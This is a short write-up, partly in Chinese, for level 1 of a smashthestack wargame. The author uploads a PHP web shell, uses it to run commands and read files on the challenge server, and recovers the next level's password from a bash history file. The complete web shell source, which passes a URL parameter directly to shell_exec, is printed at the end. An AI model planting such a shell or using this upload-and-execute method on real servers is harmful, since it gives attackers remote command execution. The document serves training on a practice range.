logic.smashthestack.org_level01

Getting Started

The first level of this game is accessible via the web here: Level 1.

After finishing the first level you will need to connect to the server via ssh with the following command:

    ssh -l level# logic.smashthestack.org -p2227

Replace "level#" with the correct level you are currently on, ex. level3

http://logic.smashthestack.org:8181/index.html

上传一个Php shell sim_ph_shell.php

http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=pwd
cmd = pwd/srv/www/level1/uploads


http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=ls -al /home/level1/

cmd = ls -al /home/level1/total 60
drwxr-xr-x  2 level1 level1  4096 Oct 24 14:14 .
drwx--x--x 22 root   root    4096 Jun 14 18:57 ..
-rw-r--r--  1 root   level1    43 Sep 19  2010 .bash_history
-rwxr-x---  1 root   level1  1708 Feb  5  2010 .bash_profile
-rw-rw-r--  1 root   root      55 Oct 16 22:02 README
-rw-r--r--  1 level1 level1 37710 Oct 31 14:58 tags


http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/README
cmd = cat /home/level1/READMEWhat you seek is very near. Look no further than home.

http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/tags


http://logic.smashthestack.org:8181/uploads/sim_ph_shell.php?cmd=cat /home/level1/.bash_history
cmd = cat /home/level1/.bash_historyls
who
cat README
ach3sa6F
clear
su level2

password is :ach3sa6F for next level

webshell content:

<?php
echo "<pre>\n";
echo "cmd = ".$_GET['cmd'];
$cmd = $_GET['cmd'];
echo shell_exec((string)$cmd);
echo "</pre>";
?>